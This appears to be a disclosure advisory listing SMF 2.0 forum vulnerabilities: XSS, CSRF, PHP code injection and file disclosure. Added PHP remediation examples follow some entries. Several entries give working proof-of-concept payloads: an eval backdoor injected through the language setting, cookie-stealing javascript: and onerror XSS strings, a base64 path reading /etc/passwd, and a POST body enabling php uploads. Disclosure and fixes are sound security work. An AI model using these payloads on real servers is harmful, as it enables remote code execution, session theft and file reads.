This is the first batch of vulnerabilities found by the SimpleAudit team from elhacker.net
http://labs.elhacker.net/simpleaudit
Our goal is to evaluate the security of SMF 2.0 before using it on our own server, and we have found several security vulnerabilities.
The vulnerabilities that also apply to SMF 1.1.10 were fixed by the SMF team today in SMF 1.1.11; visit simplemachines.org for details.
You can review the list of the published vulnerabilities at:
http://code.google.com/p/smf2-review/issues/list
Description: XSS in 'website' field in User Profile
Discovered by: [email protected]
Vulnerable code: Sources/Profile-Modify.php:802
Vulnerable URL: N/A
PoC: javascript:alert(document.cookie);//http://xx
Description: PHP Remote Code Execution
Discovered by: [email protected]
Vulnerable code: Sources/ManageServer.php:1409
Vulnerable URL: Themes/default/languages/index.english.php
PoC: en_US\\\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //
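The two entries above both come down to a user-controlled string reaching a sensitive sink without an allowlist: a `javascript:` pseudo-URL stored as a profile website, and a language value carrying quotes and backslashes that is spliced into a PHP string literal in the settings file. The following added example, which is not SMF code, shows the validation a maintainer would put in front of each sink. The function names and the `index.<lang>.php` file layout are assumptions.

```php
<?php
// Added example (not SMF code): allowlist validation for two inputs from this
// advisory, the profile "website" URL and the forum language setting.
// Function names and the index.<lang>.php file layout are assumptions.

/**
 * Accept only absolute http/https URLs for the website field. A value such as
 * javascript:alert(document.cookie);//http://xx has no http(s) scheme and is
 * rejected before it can ever reach an href attribute.
 */
function validate_website_url(string $url): ?string
{
    $url = trim($url);
    if ($url === '' || strlen($url) > 2048) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return $url;
}

/**
 * Render a validated URL. Output encoding is still required: the scheme check
 * stops javascript: links, the encoding stops attribute breakout with quotes.
 */
function website_link_html(string $url): string
{
    $safe = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    return '<a href="' . $safe . '" rel="nofollow">' . $safe . '</a>';
}

/**
 * Accept a language name only if it is a plain token (letters, optional _XX
 * region) and a matching language file exists. Quotes, backslashes and
 * semicolons never pass, so the value cannot break out of the quoted string
 * literal it is written into in the settings file.
 */
function validate_language(string $lang, string $langDir): ?string
{
    if (!preg_match('/^[A-Za-z]{2,32}(?:_[A-Za-z]{2})?$/', $lang)) {
        return null;
    }
    $file = $langDir . '/index.' . $lang . '.php';
    if (!is_file($file)) {
        return null;
    }
    return $lang;
}

// Usage in the profile handler: reject the request instead of storing a bad URL.
$website = validate_website_url($_POST['website'] ?? '');
if ($website === null) {
    http_response_code(400);
    exit('Invalid website URL');
}

// Usage in the server-settings handler, before anything is written to Settings.php.
$language = validate_language($_POST['language'] ?? '', __DIR__ . '/Themes/default/languages');
if ($language === null) {
    http_response_code(400);
    exit('Invalid language');
}
```

The scheme allowlist is the part that matters for the website field; encoding alone would not help, because `javascript:alert(...)` contains nothing that `htmlspecialchars` changes. For the language value, validating against the files that actually exist is stricter than escaping and removes the string-literal sink from the attack surface entirely.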
Description: CSRF theme change
Discovered by: [email protected]
Vulnerable code: Sources/Load.php#1245
Vulnerable URL: index.php?theme=2
PoC: N/A
Description: Subforum Category Collapse CSRF
Discovered by: [email protected]
Vulnerable code: Sources/BoardIndex.php:130
Vulnerable URL: index.php?action=collapse;c=1;sa=collapse
PoC: N/A
Description: CSRF in package server manager
Discovered by: [email protected]
Vulnerable code: Sources/Packages.php#1189
Vulnerable URL:
http://127.0.0.1/smf_2/index.php?action=admin;area=packages;get;sa=remove;server=1
PoC: N/A
Description: XSS in package server manager
Discovered by: [email protected]
Vulnerable code: Sources/PackageGet.php#732
Vulnerable URL: index.php?action=packageget
PoC: "Add server" => Name: <h1>XSS</h1>
Description: CSRF package deletion and installed package disclosure
Discovered by: [email protected]
Vulnerable code: Sources/Packages.php#1189
Vulnerable URL:
/index.php?action=admin;area=packages;sa=remove;package=.htaccess
PoC: N/A
Description: Attached files configuration CSRF
Discovered by: [email protected]
Vulnerable code: Sources/ManageAttachments.php#117
Sources/ManageAttachments.php#162
Vulnerable URL:
/index.php?action=admin;area=manageattachments;sa=attachments
PoC: POST:
attachmentEnable=1&attachmentExtensions=com%2Cexe%2Cphp5%2Cphp4%2Cconf%2Ccfg%2Cini%2Chtaccess%2Cphp&attachmentUploadDir=%2Fopt%2Flampp%2Fhtdocs%2Fsmf_2%2Fattachments&attachmentDirSizeLimit=10240&attachmentPostLimit=192&attachmentSizeLimit=128&attachmentNumPerPostLimit=4&attachmentShowImages=1&attachmentThumbnails=1&attachmentThumbWidth=150&attachmentThumbHeight=150
Description: XSS in "Enable basic HTML in posts"
Discovered by: [email protected]
Vulnerable code: N/A
Vulnerable URL: N/A
PoC: <img src="http:// alt="x http://www.google.com/onerror=alert(1)// x">
Description: Remote File Disclosure logs
Discovered by: [email protected]
Vulnerable code: N/A
Vulnerable URL:
index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q==
PoC: An attacker forcing that page to render as CSS can read its content.
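The `file=` value in the URL above is base64 (`L2V0Yy9wYXNzd2Q==` decodes to `/etc/passwd`), so the viewer is being handed an arbitrary path. The following added example, which is not SMF code, is a hypothetical admin file viewer that decodes the parameter strictly, canonicalises the path, refuses anything outside the forum root, and sends headers that keep another origin from loading the response as a stylesheet. Function names and the root-directory choice are assumptions.

```php
<?php
// Added example (not SMF code): a hypothetical admin file viewer that takes a
// base64-encoded path, as the advisory's file= parameter does, and refuses
// anything outside the forum root. Function names are assumptions.

/**
 * Decode the file parameter and return a canonical path only if it lies inside
 * $allowedRoot and is a .php source; otherwise null.
 */
function resolve_viewable_file(string $encoded, string $allowedRoot): ?string
{
    // Strict mode returns false for input with characters outside the base64
    // alphabet, so garbage never reaches the filesystem calls below.
    $raw = base64_decode($encoded, true);
    if ($raw === false || $raw === '' || strpos($raw, "\0") !== false) {
        return null;
    }
    $root = realpath($allowedRoot);
    // realpath() resolves ../ segments and symlinks, so the containment test
    // below is made on the canonical path rather than on the attacker's string.
    $path = realpath($raw);
    if ($root === false || $path === false || !is_file($path)) {
        return null;
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;   // e.g. /etc/passwd resolves outside the forum root
    }
    if (substr($path, -4) !== '.php') {
        return null;   // an error-log viewer only ever needs PHP sources
    }
    return $path;
}

/**
 * Emit the requested lines as plain text. text/plain plus nosniff keeps a
 * browser from interpreting the response as a stylesheet or script when a
 * page on another origin links to it.
 */
function send_source_excerpt(string $path, int $line, int $context = 10): void
{
    header('Content-Type: text/plain; charset=UTF-8');
    header('X-Content-Type-Options: nosniff');
    header('X-Frame-Options: DENY');
    header('Cache-Control: no-store');
    $lines = file($path, FILE_IGNORE_NEW_LINES);
    $from = max(0, $line - 1 - $context);
    $to = min(count($lines) - 1, $line - 1 + $context);
    for ($i = $from; $i <= $to; $i++) {
        echo ($i + 1) . ': ' . $lines[$i] . "\n";
    }
}

// Usage: the admin session check is assumed to have run before this point, and
// the forum root is assumed to be the parent of this script's directory.
$path = resolve_viewable_file($_GET['file'] ?? '', dirname(__DIR__));
if ($path === null) {
    http_response_code(403);
    exit('File not permitted');
}
send_source_excerpt($path, (int) ($_GET['line'] ?? 1));
```

The containment check compares against the canonical root with a trailing separator, so a sibling directory whose name merely starts with the root's name (for example `smf_2_backup` next to `smf_2`) is also rejected.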
Description: CSRF in Moderation Preferences
Discovered by: [email protected]
Vulnerable code: N/A
Vulnerable URL: index.php?action=moderate;area=settings
PoC: This page is not protected against CSRF.
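Six of the entries in this batch (theme change, category collapse, package server removal, package deletion, attachment settings and moderation preferences) are the same defect: a state-changing action accepted from a bare link or form with nothing tying the request to the logged-in session. The following added example, which is not SMF code, shows a session-bound anti-CSRF token issued once per session and required on every such action. Function names are assumptions.

```php
<?php
// Added example (not SMF code): a session-bound anti-CSRF token, issued once
// per session and required on every state-changing request. Function names
// are assumptions; the actions named in comments are those in this advisory.

function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        // 256 bits from the CSPRNG; the token is unguessable by design.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to embed in every form that changes state. */
function csrf_form_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/** True only if the submitted token matches the session token. */
function csrf_check(array $request): bool
{
    $given = $request['csrf_token'] ?? null;
    // hash_equals() compares in constant time, so a forged token cannot be
    // refined byte by byte from response timing.
    return is_string($given) && hash_equals(csrf_token(), $given);
}

/**
 * Guard for any state-changing action (theme change, category collapse,
 * package removal, attachment settings, moderation preferences): require POST
 * and a valid token. A bare GET such as index.php?theme=2 embedded on a
 * third-party page then changes nothing.
 */
function require_csrf_protected_post(array $server, array $post): void
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST' || !csrf_check($post)) {
        http_response_code(403);
        exit('Missing or invalid request token');
    }
}

// Usage inside the theme-change handler:
require_csrf_protected_post($_SERVER, $_POST);
$theme = filter_var($_POST['theme'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($theme === false) {
    http_response_code(400);
    exit('Invalid theme id');
}
// ... persist $theme for the current user ...
```

Moving the actions from GET to POST is part of the fix, not a substitute for the token: a cross-site form can still POST, so only the session-bound token that the attacker's page cannot read breaks the forgery. On PHP 7.3 and later, setting the session cookie's `samesite` attribute through `session_set_cookie_params()` adds a second, browser-enforced layer.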